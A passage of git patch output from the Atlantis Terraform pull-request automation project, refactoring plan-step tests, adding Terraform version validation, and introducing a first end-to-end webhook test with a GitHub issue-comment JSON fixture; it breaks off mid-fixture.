TerraformExecutor: terraform, + DefaultTFVersion: tfVersion, } - When(terraform.RunCommandWithVersion(logger, "/path", []string{"workspace", "show"}, tfVersion, "workspace")).ThenReturn("workspace\n", nil) expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/workspace.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"} When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil) - output, err := s.Run() + output, err := s.Run(models.ProjectCommandContext{ + Log: logger, + Workspace: "workspace", + RepoRelPath: ".", + User: models.User{Username: "username"}, + CommentArgs: []string{"comment", "args"}, + }, []string{"extra", "args"}, "/path") Ok(t, err) Equals(t, "output", output) @@ -258,28 +243,25 @@ func TestRun_AddsEnvVarFile(t *testing.T) { // Using version >= 0.10 here so we don't expect any env commands. tfVersion, _ := version.NewVersion("0.10.0") logger := logging.NewNoopLogger() - s := runtime.PlanStep{ - Meta: runtime.StepMeta{ - Log: logger, - Workspace: "workspace", - AbsolutePath: tmpDir, - DirRelativeToRepoRoot: ".", - TerraformExecutor: terraform, - TerraformVersion: tfVersion, - ExtraCommentArgs: []string{"comment", "args"}, - Username: "username", - }, - ExtraArgs: []string{"extra", "args"}, + s := runtime.PlanStepOperator{ + TerraformExecutor: terraform, + DefaultTFVersion: tfVersion, } expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", filepath.Join(tmpDir, "workspace.tfplan"), "-var", "atlantis_user=username", "extra", "args", "comment", "args", "-var-file", envVarsFile} When(terraform.RunCommandWithVersion(logger, tmpDir, expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil) - output, err := s.Run() + output, err := s.Run(models.ProjectCommandContext{ + Log: logger, + Workspace: "workspace", + RepoRelPath: ".", + User: models.User{Username: "username"}, + CommentArgs: []string{"comment", "args"}, + }, []string{"extra", "args"}, tmpDir) Ok(t, err) - Equals(t, "output", output) // Verify that env select was never called since we're in version >= 0.10 terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, tmpDir, []string{"env", "select", "-no-color", "workspace"}, tfVersion, "workspace") terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, tmpDir, expPlanArgs, tfVersion, "workspace") + Equals(t, "output", output) } diff --git a/server/events/yaml/parser_validator_test.go b/server/events/yaml/parser_validator_test.go index 51fa1ca702..15bcd19602 100644 --- a/server/events/yaml/parser_validator_test.go +++ b/server/events/yaml/parser_validator_test.go @@ -6,6 +6,7 @@ import ( "path/filepath" "testing" + "github.com/hashicorp/go-version" "github.com/runatlantis/atlantis/server/events/yaml" "github.com/runatlantis/atlantis/server/events/yaml/valid" . "github.com/runatlantis/atlantis/testing" @@ -72,6 +73,7 @@ func TestReadConfig_UnmarshalErrors(t *testing.T) { } func TestReadConfig(t *testing.T) { + tfVersion, _ := version.NewVersion("v0.11.0") cases := []struct { description string input string @@ -169,7 +171,7 @@ workflows: Dir: ".", Workspace: "myworkspace", Workflow: String("myworkflow"), - TerraformVersion: String("v0.11.0"), + TerraformVersion: tfVersion, Autoplan: valid.Autoplan{ WhenModified: []string{"**/*.tf"}, Enabled: true, @@ -203,7 +205,7 @@ workflows: Dir: ".", Workspace: "myworkspace", Workflow: String("myworkflow"), - TerraformVersion: String("v0.11.0"), + TerraformVersion: tfVersion, Autoplan: valid.Autoplan{ WhenModified: []string{"**/*.tf"}, Enabled: false, diff --git a/server/events/yaml/raw/project.go b/server/events/yaml/raw/project.go index 3273cb38a1..29335e7954 100644 --- a/server/events/yaml/raw/project.go +++ b/server/events/yaml/raw/project.go @@ -1,12 +1,12 @@ package raw import ( - "errors" "fmt" "strings" "github.com/go-ozzo/ozzo-validation" "github.com/hashicorp/go-version" + "github.com/pkg/errors" "github.com/runatlantis/atlantis/server/events/yaml/valid" ) @@ -41,11 +41,12 @@ func (p Project) Validate() error { return nil } validTFVersion := func(value interface{}) error { - // Safe to dereference because this is only called if the pointer is - // not nil. - versionStr := *value.(*string) - _, err := version.NewVersion(versionStr) - return err + strPtr := value.(*string) + if strPtr == nil { + return nil + } + _, err := version.NewVersion(*strPtr) + return errors.Wrapf(err, "version %q could not be parsed", *strPtr) } return validation.ValidateStruct(&p, validation.Field(&p.Dir, validation.Required, validation.By(hasDotDot)), diff --git a/server/events/yaml/raw/project_test.go b/server/events/yaml/raw/project_test.go index 9c06914896..b10452afeb 100644 --- a/server/events/yaml/raw/project_test.go +++ b/server/events/yaml/raw/project_test.go @@ -4,6 +4,7 @@ import ( "testing" "github.com/go-ozzo/ozzo-validation" + "github.com/hashicorp/go-version" "github.com/runatlantis/atlantis/server/events/yaml/raw" "github.com/runatlantis/atlantis/server/events/yaml/valid" . "github.com/runatlantis/atlantis/testing" @@ -107,6 +108,30 @@ func TestProject_Validate(t *testing.T) { }, expErr: "", }, + { + description: "empty tf version string", + input: raw.Project{ + Dir: String("."), + TerraformVersion: String(""), + }, + expErr: "terraform_version: version \"\" could not be parsed: Malformed version: .", + }, + { + description: "tf version with v prepended", + input: raw.Project{ + Dir: String("."), + TerraformVersion: String("v1"), + }, + expErr: "", + }, + { + description: "tf version without prepended", + input: raw.Project{ + Dir: String("."), + TerraformVersion: String("1"), + }, + expErr: "", + }, } validation.ErrorTag = "yaml" for _, c := range cases { @@ -122,6 +147,7 @@ func TestProject_Validate(t *testing.T) { } func TestProject_ToValid(t *testing.T) { + tfVersionPointEleven, _ := version.NewVersion("v0.11.0") cases := []struct { description string input raw.Project @@ -161,7 +187,7 @@ func TestProject_ToValid(t *testing.T) { Dir: ".", Workspace: "myworkspace", Workflow: String("myworkflow"), - TerraformVersion: String("v0.11.0"), + TerraformVersion: tfVersionPointEleven, Autoplan: valid.Autoplan{ WhenModified: []string{"hi"}, Enabled: false, @@ -169,6 +195,22 @@ func TestProject_ToValid(t *testing.T) { ApplyRequirements: []string{"approved"}, }, }, + { + description: "tf version without 'v'", + input: raw.Project{ + Dir: String("."), + TerraformVersion: String("0.11.0"), + }, + exp: valid.Project{ + Dir: ".", + Workspace: "default", + TerraformVersion: tfVersionPointEleven, + Autoplan: valid.Autoplan{ + WhenModified: []string{"**/*.tf"}, + Enabled: true, + }, + }, + }, } for _, c := range cases { t.Run(c.description, func(t *testing.T) { diff --git a/server/events_controller_test.go b/server/events_controller_test.go index 7997a56d8a..bb0682ba6f 100644 --- a/server/events_controller_test.go +++ b/server/events_controller_test.go @@ -293,31 +293,6 @@ func TestPost_GithubCommentSuccess(t *testing.T) { cr.VerifyWasCalledOnce().ExecuteCommand(baseRepo, baseRepo, user, 1, &cmd) } -func TestPost_GithubPullRequestNotClosed(t *testing.T) { - t.Log("when the event is a github pull reuqest but it's not a closed event we ignore it") - e, v, _, _, _, _, _, _ := setup(t) - req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) - req.Header.Set(githubHeader, "pull_request") - event := `{"action": "opened"}` - When(v.Validate(req, secret)).ThenReturn([]byte(event), nil) - w := httptest.NewRecorder() - e.Post(w, req) - responseContains(t, w, http.StatusOK, "Ignoring opened pull request event") -} - -func TestPost_GitlabMergeRequestNotClosed(t *testing.T) { - t.Log("when the event is a gitlab merge request but it's not a closed event we ignore it") - e, _, gl, p, _, _, _, _ := setup(t) - req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) - req.Header.Set(gitlabHeader, "value") - event := gitlab.MergeEvent{} - When(gl.Validate(req, secret)).ThenReturn(event, nil) - When(p.ParseGitlabMergeEvent(event)).ThenReturn(models.PullRequest{State: models.Open}, models.Repo{}, nil) - w := httptest.NewRecorder() - e.Post(w, req) - responseContains(t, w, http.StatusOK, "Ignoring opened pull request event") -} - func TestPost_GithubPullRequestInvalid(t *testing.T) { t.Log("when the event is a github pull request with invalid data we return a 400") e, v, _, p, _, _, _, _ := setup(t) @@ -383,15 +358,14 @@ func TestPost_GithubPullRequestErrCleaningPull(t *testing.T) { } func TestPost_GitlabMergeRequestErrCleaningPull(t *testing.T) { - t.Log("when the event is a gitlab merge request and an error occurs calling CleanUpPull we return a 503") + t.Log("when the event is a gitlab merge request and an error occurs calling CleanUpPull we return a 500") e, _, gl, p, _, c, _, _ := setup(t) req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(gitlabHeader, "value") - event := gitlab.MergeEvent{} - When(gl.Validate(req, secret)).ThenReturn(event, nil) + When(gl.Validate(req, secret)).ThenReturn(gitlabMergeEvent, nil) repo := models.Repo{} pullRequest := models.PullRequest{State: models.Closed} - When(p.ParseGitlabMergeEvent(event)).ThenReturn(pullRequest, repo, nil) + When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, nil) When(c.CleanUpPull(repo, pullRequest)).ThenReturn(errors.New("err")) w := httptest.NewRecorder() e.Post(w, req) @@ -421,11 +395,10 @@ func TestPost_GitlabMergeRequestSuccess(t *testing.T) { e, _, gl, p, _, _, _, _ := setup(t) req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(gitlabHeader, "value") - event := gitlab.MergeEvent{} - When(gl.Validate(req, secret)).ThenReturn(event, nil) + When(gl.Validate(req, secret)).ThenReturn(gitlabMergeEvent, nil) repo := models.Repo{} pullRequest := models.PullRequest{State: models.Closed} - When(p.ParseGitlabMergeEvent(event)).ThenReturn(pullRequest, repo, nil) + When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, nil) w := httptest.NewRecorder() e.Post(w, req) responseContains(t, w, http.StatusOK, "Pull request cleaned successfully") @@ -458,3 +431,60 @@ func setup(t *testing.T) (server.EventsController, *mocks.MockGithubRequestValid } return e, v, gl, p, cr, c, vcsmock, cp } + +var gitlabMergeEvent = gitlab.MergeEvent{ + ObjectAttributes: struct { + ID int `json:"id"` + TargetBranch string `json:"target_branch"` + SourceBranch string `json:"source_branch"` + SourceProjectID int `json:"source_project_id"` + AuthorID int `json:"author_id"` + AssigneeID int `json:"assignee_id"` + Title string `json:"title"` + CreatedAt string `json:"created_at"` + UpdatedAt string `json:"updated_at"` + StCommits []*gitlab.Commit `json:"st_commits"` + StDiffs []*gitlab.Diff `json:"st_diffs"` + MilestoneID int `json:"milestone_id"` + State string `json:"state"` + MergeStatus string `json:"merge_status"` + TargetProjectID int `json:"target_project_id"` + IID int `json:"iid"` + Description string `json:"description"` + Position int `json:"position"` + LockedAt string `json:"locked_at"` + UpdatedByID int `json:"updated_by_id"` + MergeError string `json:"merge_error"` + MergeParams struct { + ForceRemoveSourceBranch string `json:"force_remove_source_branch"` + } `json:"merge_params"` + MergeWhenBuildSucceeds bool `json:"merge_when_build_succeeds"` + MergeUserID int `json:"merge_user_id"` + MergeCommitSha string `json:"merge_commit_sha"` + DeletedAt string `json:"deleted_at"` + ApprovalsBeforeMerge string `json:"approvals_before_merge"` + RebaseCommitSha string `json:"rebase_commit_sha"` + InProgressMergeCommitSha string `json:"in_progress_merge_commit_sha"` + LockVersion int `json:"lock_version"` + TimeEstimate int `json:"time_estimate"` + Source *gitlab.Repository `json:"source"` + Target *gitlab.Repository `json:"target"` + LastCommit struct { + ID string `json:"id"` + Message string `json:"message"` + Timestamp *time.Time `json:"timestamp"` + URL string `json:"url"` + Author *gitlab.Author `json:"author"` + } `json:"last_commit"` + WorkInProgress bool `json:"work_in_progress"` + URL string `json:"url"` + Action string `json:"action"` + Assignee struct { + Name string `json:"name"` + Username string `json:"username"` + AvatarURL string `json:"avatar_url"` + } `json:"assignee"` + }{ + Action: "merge", + }, +} diff --git a/server/logging/simple_logger.go b/server/logging/simple_logger.go index eca5778e4f..ddb56ebcd4 100644 --- a/server/logging/simple_logger.go +++ b/server/logging/simple_logger.go @@ -23,8 +23,6 @@ import ( "unicode" ) -//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_simple_logging.go SimpleLogging - // SimpleLogging is the interface that our SimpleLogger implements. // It's really only used for mocking when we need to test what's being logged. type SimpleLogging interface { diff --git a/server/server.go b/server/server.go index fe6e3f7b5f..734a36de4d 100644 --- a/server/server.go +++ b/server/server.go @@ -232,7 +232,7 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { Logger: logger, AllowForkPRs: userConfig.AllowForkPRs, AllowForkPRsFlag: config.AllowForkPRsFlag, - PullRequestOperator: events.PullRequestOperator{ + PullRequestOperator: &events.DefaultPullRequestOperator{ TerraformExecutor: terraformClient, DefaultTFVersion: defaultTfVersion, ParserValidator: &yaml.ParserValidator{}, From e97b98e4a04c71c5b2d1f7ef3a215e22a40d0cca Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Fri, 15 Jun 2018 17:52:14 +0100 Subject: [PATCH 23/69] Add first e2e test with mocks. --- server/events/project_operator.go | 7 +- server/events_controller.go | 14 +- server/events_controller_e2e_test.go | 210 ++++++++++++++++++ .../testfixtures/githubIssueCommentEvent.json | 207 +++++++++++++++++ .../simple/exp-output-atlantis-plan.txt | 23 ++ server/testfixtures/test-repos/simple/main.tf | 3 + 6 files changed, 459 insertions(+), 5 deletions(-) create mode 100644 server/events_controller_e2e_test.go create mode 100644 server/testfixtures/githubIssueCommentEvent.json create mode 100644 server/testfixtures/test-repos/simple/exp-output-atlantis-plan.txt create mode 100644 server/testfixtures/test-repos/simple/main.tf diff --git a/server/events/project_operator.go b/server/events/project_operator.go index 37dfcb5f01..2c6c5c558b 100644 --- a/server/events/project_operator.go +++ b/server/events/project_operator.go @@ -22,6 +22,7 @@ import ( "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/webhooks" "github.com/runatlantis/atlantis/server/events/yaml/valid" + "github.com/runatlantis/atlantis/server/logging" ) //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator @@ -30,6 +31,10 @@ type LockURLGenerator interface { GenerateLockURL(lockID string) string } +type WebhooksSender interface { + Send(log *logging.SimpleLogger, result webhooks.ApplyResult) error +} + // PlanSuccess is the result of a successful plan. type PlanSuccess struct { TerraformOutput string @@ -45,7 +50,7 @@ type ProjectOperator struct { RunStepOperator runtime.RunStepOperator ApprovalOperator runtime.ApprovalOperator Workspace AtlantisWorkspace - Webhooks *webhooks.MultiWebhookSender + Webhooks WebhooksSender } func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr *string) ProjectResult { diff --git a/server/events_controller.go b/server/events_controller.go index b5b3c73300..b205f2eb8d 100644 --- a/server/events_controller.go +++ b/server/events_controller.go @@ -55,6 +55,7 @@ type EventsController struct { AtlantisGithubUser models.User // AtlantisGitlabUser is the user that atlantis is running as for Gitlab. AtlantisGitlabUser models.User + TestingMode bool } // Post handles POST webhook requests. @@ -254,11 +255,16 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo return } - // Respond with success and then actually execute the command asynchronously. - // We use a goroutine so that this function returns and the connection is - // closed. fmt.Fprintln(w, "Processing...") - go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pullNum, parseResult.Command) + if !e.TestingMode { + // Respond with success and then actually execute the command asynchronously. + // We use a goroutine so that this function returns and the connection is + // closed. + go e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pullNum, parseResult.Command) + } else { + // When testing we want to wait for everything to complete. + e.CommandRunner.ExecuteCommand(baseRepo, headRepo, user, pullNum, parseResult.Command) + } } // HandleGitlabMergeRequestEvent will delete any locks associated with the pull diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go new file mode 100644 index 0000000000..97883c0a14 --- /dev/null +++ b/server/events_controller_e2e_test.go @@ -0,0 +1,210 @@ +package server_test + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "net/http/httptest" + "os" + "path/filepath" + "strings" + "testing" + + "github.com/google/go-github/github" + . "github.com/petergtz/pegomock" + "github.com/runatlantis/atlantis/server" + "github.com/runatlantis/atlantis/server/events" + "github.com/runatlantis/atlantis/server/events/locking" + "github.com/runatlantis/atlantis/server/events/locking/boltdb" + "github.com/runatlantis/atlantis/server/events/mocks" + "github.com/runatlantis/atlantis/server/events/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/runtime" + "github.com/runatlantis/atlantis/server/events/terraform" + vcsmocks "github.com/runatlantis/atlantis/server/events/vcs/mocks" + "github.com/runatlantis/atlantis/server/events/webhooks" + "github.com/runatlantis/atlantis/server/events/yaml" + "github.com/runatlantis/atlantis/server/logging" + . "github.com/runatlantis/atlantis/testing" +) + +func Test(t *testing.T) { + RegisterMockTestingT(t) + + // Config. + allowForkPRs := false + dataDir, cleanup := TempDir(t) + defer cleanup() + + // Mocks. + e2eVCSClient := vcsmocks.NewMockClientProxy() + e2eStatusUpdater := mocks.NewMockCommitStatusUpdater() + e2eGithubGetter := mocks.NewMockGithubPullGetter() + e2eGitlabGetter := mocks.NewMockGitlabMergeRequestGetter() + e2eWorkspace := mocks.NewMockAtlantisWorkspace() + + // Real dependencies. + logger := logging.NewSimpleLogger("server", nil, true, logging.Debug) + eventParser := &events.EventParser{ + GithubUser: "github-user", + GithubToken: "github-token", + GitlabUser: "gitlab-user", + GitlabToken: "gitlab-token", + } + commentParser := &events.CommentParser{ + GithubUser: "github-user", + GithubToken: "github-token", + GitlabUser: "gitlab-user", + GitlabToken: "gitlab-token", + } + terraformClient, err := terraform.NewClient(dataDir) + Ok(t, err) + boltdb, err := boltdb.New(dataDir) + Ok(t, err) + lockingClient := locking.NewClient(boltdb) + projectLocker := &events.DefaultProjectLocker{ + Locker: lockingClient, + } + + defaultTFVersion := terraformClient.Version() + commandHandler := &events.CommandHandler{ + EventParser: eventParser, + VCSClient: e2eVCSClient, + GithubPullGetter: e2eGithubGetter, + GitlabMergeRequestGetter: e2eGitlabGetter, + CommitStatusUpdater: e2eStatusUpdater, + AtlantisWorkspaceLocker: events.NewDefaultAtlantisWorkspaceLocker(), + MarkdownRenderer: &events.MarkdownRenderer{}, + Logger: logger, + AllowForkPRs: allowForkPRs, + AllowForkPRsFlag: "allow-fork-prs", + PullRequestOperator: &events.DefaultPullRequestOperator{ + TerraformExecutor: terraformClient, + DefaultTFVersion: defaultTFVersion, + ParserValidator: &yaml.ParserValidator{}, + ProjectFinder: &events.DefaultProjectFinder{}, + VCSClient: e2eVCSClient, + Workspace: e2eWorkspace, + ProjectOperator: events.ProjectOperator{ + Locker: projectLocker, + LockURLGenerator: &mockLockURLGenerator{}, + InitStepOperator: runtime.InitStepOperator{ + TerraformExecutor: terraformClient, + DefaultTFVersion: defaultTFVersion, + }, + PlanStepOperator: runtime.PlanStepOperator{ + TerraformExecutor: terraformClient, + DefaultTFVersion: defaultTFVersion, + }, + ApplyStepOperator: runtime.ApplyStepOperator{ + TerraformExecutor: terraformClient, + }, + RunStepOperator: runtime.RunStepOperator{}, + ApprovalOperator: runtime.ApprovalOperator{ + VCSClient: e2eVCSClient, + }, + Workspace: e2eWorkspace, + Webhooks: &mockWebhookSender{}, + }, + }, + } + + ctrl := server.EventsController{ + TestingMode: true, + CommandRunner: commandHandler, + PullCleaner: nil, + Logger: logger, + Parser: eventParser, + CommentParser: commentParser, + GithubWebHookSecret: nil, + GithubRequestValidator: &server.DefaultGithubRequestValidator{}, + GitlabRequestParser: &server.DefaultGitlabRequestParser{}, + GitlabWebHookSecret: nil, + RepoWhitelist: &events.RepoWhitelist{ + Whitelist: "*", + }, + SupportedVCSHosts: []models.VCSHostType{models.Gitlab, models.Github}, + VCSClient: e2eVCSClient, + AtlantisGithubUser: models.User{ + Username: "atlantisbot", + }, + AtlantisGitlabUser: models.User{ + Username: "atlantisbot", + }, + } + + // Test GitHub Post + req := GitHubCommentEvent(t, "atlantis plan") + w := httptest.NewRecorder() + When(e2eGithubGetter.GetPullRequest(AnyRepo(), AnyInt())).ThenReturn(GitHubPullRequestParsed(), nil) + testRepoDir, err := filepath.Abs("testfixtures/test-repos/simple") + Ok(t, err) + When(e2eWorkspace.Clone(matchers.AnyPtrToLoggingSimpleLogger(), AnyRepo(), AnyRepo(), matchers.AnyModelsPullRequest(), AnyString())).ThenReturn(testRepoDir, nil) + // Clean up .terraform and plan files when we're done. + defer func() { + os.RemoveAll(filepath.Join(testRepoDir, ".terraform")) + planFiles, _ := filepath.Glob(testRepoDir + "/*.tfplan") + for _, file := range planFiles { + os.Remove(file) + } + }() + + ctrl.Post(w, req) + responseContains(t, w, 200, "Processing...") + _, _, comment := e2eVCSClient.VerifyWasCalledOnce().CreateComment(AnyRepo(), AnyInt(), AnyString()).GetCapturedArguments() + + exp, err := ioutil.ReadFile(filepath.Join(testRepoDir, "exp-output-atlantis-plan.txt")) + fmt.Println((string(exp))) + Ok(t, err) + + Equals(t, string(exp), comment) +} + +type mockLockURLGenerator struct{} + +func (m *mockLockURLGenerator) GenerateLockURL(lockID string) string { + return "lock-url" +} + +type mockWebhookSender struct{} + +func (w *mockWebhookSender) Send(log *logging.SimpleLogger, result webhooks.ApplyResult) error { + return nil +} + +func GitHubCommentEvent(t *testing.T, comment string) *http.Request { + requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "githubIssueCommentEvent.json")) + Ok(t, err) + requestJSON = []byte(strings.Replace(string(requestJSON), "###comment body###", comment, 1)) + req, err := http.NewRequest("POST", "/events", bytes.NewBuffer(requestJSON)) + Ok(t, err) + req.Header.Set("Content-Type", "application/json") + req.Header.Set(githubHeader, "issue_comment") + return req +} + +func GitHubPullRequestParsed() *github.PullRequest { + return &github.PullRequest{ + Number: github.Int(1), + State: github.String("open"), + HTMLURL: github.String("htmlurl"), + Head: &github.PullRequestBranch{ + Repo: &github.Repository{ + FullName: github.String("runatlantis/atlantis-tests"), + CloneURL: github.String("/runatlantis/atlantis-tests.git"), + }, + SHA: github.String("sha"), + Ref: github.String("branch"), + }, + Base: &github.PullRequestBranch{ + Repo: &github.Repository{ + FullName: github.String("runatlantis/atlantis-tests"), + CloneURL: github.String("/runatlantis/atlantis-tests.git"), + }, + }, + User: &github.User{ + Login: github.String("atlantisbot"), + }, + } +} diff --git a/server/testfixtures/githubIssueCommentEvent.json b/server/testfixtures/githubIssueCommentEvent.json new file mode 100644 index 0000000000..a15f67ed4a --- /dev/null +++ b/server/testfixtures/githubIssueCommentEvent.json @@ -0,0 +1,207 @@ +{ + "action": "created", + "issue": { + "url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1", + "repository_url": "https://api.github.com/repos/runatlantis/atlantis-tests", + "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/labels{/name}", + "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/comments", + "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1/events", + "html_url": "https://github.com/runatlantis/atlantis-tests/pull/1", + "id": 330256251, + "node_id": "MDExOlB1bGxSZXF1ZXN0MTkzMzA4NzA3", + "number": 1, + "title": "Add new project layouts", + "user": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "labels": [ + + ], + "state": "open", + "locked": false, + "assignee": null, + "assignees": [ + + ], + "milestone": null, + "comments": 61, + "created_at": "2018-06-07T12:45:41Z", + "updated_at": "2018-06-13T12:53:40Z", + "closed_at": null, + "author_association": "OWNER", + "pull_request": { + "url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls/1", + "html_url": "https://github.com/runatlantis/atlantis-tests/pull/1", + "diff_url": "https://github.com/runatlantis/atlantis-tests/pull/1.diff", + "patch_url": "https://github.com/runatlantis/atlantis-tests/pull/1.patch" + }, + "body": "" + }, + "comment": { + "url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments/396926483", + "html_url": "https://github.com/runatlantis/atlantis-tests/pull/1#issuecomment-396926483", + "issue_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/1", + "id": 396926483, + "node_id": "MDEyOklzc3VlQ29tbWVudDM5NjkyNjQ4Mw==", + "user": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "created_at": "2018-06-13T12:53:40Z", + "updated_at": "2018-06-13T12:53:40Z", + "author_association": "OWNER", + "body": "###comment body###" + }, + "repository": { + "id": 136474117, + "node_id": "MDEwOlJlcG9zaXRvcnkxMzY0NzQxMTc=", + "name": "atlantis-tests", + "full_name": "runatlantis/atlantis-tests", + "owner": { + "login": "runatlantis", + "id": 1034429, + "node_id": "MDQ6VXNlcjEwMzQ0Mjk=", + "avatar_url": "https://avatars1.githubusercontent.com/u/1034429?v=4", + "gravatar_id": "", + "url": "https://api.github.com/users/runatlantis", + "html_url": "https://github.com/runatlantis", + "followers_url": "https://api.github.com/users/runatlantis/followers", + "following_url": "https://api.github.com/users/runatlantis/following{/other_user}", + "gists_url": "https://api.github.com/users/runatlantis/gists{/gist_id}", + "starred_url": "https://api.github.com/users/runatlantis/starred{/owner}{/repo}", + "subscriptions_url": "https://api.github.com/users/runatlantis/subscriptions", + "organizations_url": "https://api.github.com/users/runatlantis/orgs", + "repos_url": "https://api.github.com/users/runatlantis/repos", + "events_url": "https://api.github.com/users/runatlantis/events{/privacy}", + "received_events_url": "https://api.github.com/users/runatlantis/received_events", + "type": "User", + "site_admin": false + }, + "private": false, + "html_url": "https://github.com/runatlantis/atlantis-tests", + "description": "A set of terraform projects that atlantis e2e tests run on.", + "fork": true, + "url": "https://api.github.com/repos/runatlantis/atlantis-tests", + "forks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/forks", + "keys_url": "https://api.github.com/repos/runatlantis/atlantis-tests/keys{/key_id}", + "collaborators_url": "https://api.github.com/repos/runatlantis/atlantis-tests/collaborators{/collaborator}", + "teams_url": "https://api.github.com/repos/runatlantis/atlantis-tests/teams", + "hooks_url": "https://api.github.com/repos/runatlantis/atlantis-tests/hooks", + "issue_events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/events{/number}", + "events_url": "https://api.github.com/repos/runatlantis/atlantis-tests/events", + "assignees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/assignees{/user}", + "branches_url": "https://api.github.com/repos/runatlantis/atlantis-tests/branches{/branch}", + "tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/tags", + "blobs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/blobs{/sha}", + "git_tags_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/tags{/sha}", + "git_refs_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/refs{/sha}", + "trees_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/trees{/sha}", + "statuses_url": "https://api.github.com/repos/runatlantis/atlantis-tests/statuses/{sha}", + "languages_url": "https://api.github.com/repos/runatlantis/atlantis-tests/languages", + "stargazers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/stargazers", + "contributors_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contributors", + "subscribers_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscribers", + "subscription_url": "https://api.github.com/repos/runatlantis/atlantis-tests/subscription", + "commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/commits{/sha}", + "git_commits_url": "https://api.github.com/repos/runatlantis/atlantis-tests/git/commits{/sha}", + "comments_url": "https://api.github.com/repos/runatlantis/atlantis-tests/comments{/number}", + "issue_comment_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues/comments{/number}", + "contents_url": "https://api.github.com/repos/runatlantis/atlantis-tests/contents/{+path}", + "compare_url": "https://api.github.com/repos/runatlantis/atlantis-tests/compare/{base}...{head}", + "merges_url": "https://api.github.com/repos/runatlantis/atlantis-tests/merges", + "archive_url": "https://api.github.com/repos/runatlantis/atlantis-tests/{archive_format}{/ref}", + "downloads_url": "https://api.github.com/repos/runatlantis/atlantis-tests/downloads", + "issues_url": "https://api.github.com/repos/runatlantis/atlantis-tests/issues{/number}", + "pulls_url": "https://api.github.com/repos/runatlantis/atlantis-tests/pulls{/number}", + "milestones_url": "https://api.github.com/repos/runatlantis/atlantis-tests/milestones{/number}", + "notifications_url": "https://api.github.com/repos/runatlantis/atlantis-tests/notifications{?since,all,participating}", + "labels_url": "https://api.github.com/repos/runatlantis/atlantis-tests/labels{/name}", + "releases_url": 